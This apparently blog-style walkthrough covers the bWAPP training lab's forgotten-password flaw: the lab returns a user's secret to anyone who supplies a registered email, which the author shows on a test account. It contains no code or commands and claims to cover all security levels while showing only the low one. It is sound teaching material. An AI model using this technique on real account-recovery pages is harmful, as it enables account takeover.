In this walk through, we will be going through the Broken Authentication (Forgotten Password) vulnerability section from bWAPP Labs. We will be exploring and exploiting Forget password functionality and how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
- Setting the security level to Low.
- The application has a “Forget secret” functionality which is used to retrieve the user’s secret if in case he has forgotten it. The functionality asks for a user’s email to see the secret. The application issued POST request to ba_forgotten.php file in order to display the secret.
- I entered a random email and got an “Invalid user!” error. That means the application is checking the registered user name only.
- I entered an email of the user bee and got the secret.
- We can exploit this functionality if we only know the user’s email. For the proof of concept, i make a fake user named “Kratos”.
- As i entered the email address of my target user, i got his secret.
Also Read: Tryhackme – Dirty Pipe: CVE-2022-0847
So, we finally completed all the security levels for the bWAPP Broken Authentication (Forgotten Password) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential attacks on Forget password functionality by making sure that the password reset token is being securely sent to the concerned user. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.